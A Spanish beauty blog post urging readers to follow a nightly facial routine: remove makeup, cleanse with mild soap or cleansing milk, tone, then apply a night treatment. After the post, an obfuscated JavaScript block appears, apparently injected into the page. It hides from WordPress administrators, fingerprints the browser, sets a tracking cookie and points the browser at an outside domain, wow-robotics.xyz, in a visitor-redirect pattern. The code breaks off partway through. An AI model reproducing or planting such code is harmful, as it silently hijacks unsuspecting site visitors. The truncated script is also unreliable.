Cuando finaliza el día, antes de irnos a dormir, desmaquillamos nuestro rostro, luego lo limpiamos y tonificamos y aplicamos nuestro tratamiento de noche, dejando una piel limpia e hidratada.

Estoy segura de que muchas de vosotras en más de una ocasión, os habéis saltado vuestro ritual de limpieza y os habéis ido a la cama sin desmaquillar ni limpiar el rostro. Pues mal!!! No debéis olvidar que solo tenemos una piel y que si no la cuidáis día a día, con el paso del tiempo os arrepentiréis.

Es muy importante desmaquillar tu piel diariamente y no solo por los restos de maquillaje sino por la suciedad acumulada al cabo del día. Para ello, os recomiendo seguir a diario estos pasos de limpieza:

1º.- Lo primero desmaquilla tu rostro con un desmaquillante específico que elimine los restos de maquillaje y suciedad.

2º.- Debes tener en cuenta limpiar tu rostro con un jabón suave o leche limpiadora.

3º.- Empapa un disco de algodón con un tónico que te ayudará a cerrar el poro.

4º.- Y para finalizar, aplica tu tratamiento de noche habitual específico para tu tipo de piel y tus necesidades.

Insisto en que la limpieza es el primer paso y una parte fundamental del tratamiento, porque de nada sirve utilizar cualquier producto de tratamiento para el rostro, si antes no limpiamos y preparamos la piel para que esos productos que vayamos a aplicar posteriormente penetren correctamente.

Di adiós a la pereza y saluda a la constancia a la hora de limpiar y desmaquillar tu rostro. Verás qué cambio!!!! 😉

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone